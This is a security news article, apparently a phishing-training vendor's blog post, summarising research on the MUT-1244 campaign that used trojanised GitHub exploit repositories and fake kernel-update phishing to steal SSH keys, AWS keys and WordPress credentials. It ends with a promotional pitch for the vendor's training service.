WordPress users have fallen victim to a massive credential theft campaign executed by a threat actor known as MUT-1244. A large-scale attack involving a compromised WordPress plugin exposed over 390,000 login credentials.
MUT-1244 has been connected to a year-long operation that targets WordPress users. This large-scale attack is part of a broader campaign involving phishing schemes and compromised GitHub repositories. These repositories hosted malicious proof-of-concept (PoC) code designed to exploit known security vulnerabilities.
Researchers at Datadog Security Labs revealed that the stolen data included SSH private keys and AWS access keys from hundreds of victims. These victims ranged from attackers themselves to penetration testers and security experts.
According to scholars Adrian Korn, Matt Muir, and Christophe Tafani-Dereeper:
Victims are believed to be offensive actors – including pentesters and security researchers, as well as malicious threat actors – and had sensitive data such as SSH private keys and AWS access keys exfiltrated.
How Attackers Leveraged GitHub and Phishing to Compromise User Credentials?
Attackers delivered payloads from GitHub projects using a variety of techniques, such as compromised npm packages, malicious PDFs, backdoored configuration files, and Python droppers.
Datadog Security Labs claims that this effort is similar to a supply-chain attack detected by Checkmarx in November. In that instance, malicious code in the “0xengine/xmlrpc” npm package was used to trojanise the “hpc20235/yawp” GitHub project, enabling the mining of Monero cryptocurrency and data theft.
MUT-1244 used malware with a cryptocurrency miner and a backdoor to steal sensitive information such as private SSH keys, AWS passwords, environment variables, and directory contents (e.g., ~/.aws).
A separate platform-hosted second-stage payload allowed data exfiltration to services such as Dropbox and file.io. Investigators also uncovered hardcoded credentials in the payload, which gave attackers instant access to stolen data.
Attackers also used phishing emails to trick academics into clicking on fraudulent site. These URLs pretended to be kernel upgrades, instructing victims to open a terminal and execute a shell command.
MUT-1244 successfully compromised users with a second-stage payload by infiltrating computers through phishing emails and trojanised GitHub repositories. Additionally, the payload deceived victims into installing a fake kernel update, disguised as a CPU microcode fix.
Korn added:
The repository contained the phishing email itself, as well as a database of 2,758 target emails scraped from arXiv, a platform for research papers. The phishing email is titled “Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users Inbox” and asks the victim to install a fake kernel upgrade.
According to reports, the yawpp GitHub project allowed the theft of approximately 390,000 passwords, mostly for WordPress accounts. The attacker used compromised threat actors who had acquired these credentials illegally to exfiltrate data to a Dropbox account under their control. The project estimated the quantity of exposed credentials by using its telemetry and third-party threat data.
The attack disrupted the software development process by compromising commonly used libraries and tools. Once deployed, the malicious code could reach a variety of downstream applications and systems.
Using popular code-sharing sites like GitHub as an attack vector highlights the critical need for challenging verification mechanisms and real-time threat detection in development workflows.
It is important to teach employees, including security teams, to spot phishing attacks, particularly when scammers aim to compromise operational requirements like kernel updates. Early threat detection can be achieved by keeping an eye out for unusual activity, especially related to cloud access routines, GitHub, or WordPress.
Phishing attacks are on the rise, and it is important to protect your organisation. One effective way to do this is by increasing user awareness about these types of attacks. Phishing Tackle is a great resource that can help you in this regard. They offer a free 14-day trial to help train your users to recognise and avoid phishing attacks.
Although technology can be helpful, it cannot spot 100% of phishing emails. Therefore, user education is important to minimising the impact of any successful attacks. Consulting with Phishing Tackle can provide valuable insights and tools to help you strengthen your defences against phishing attacks.
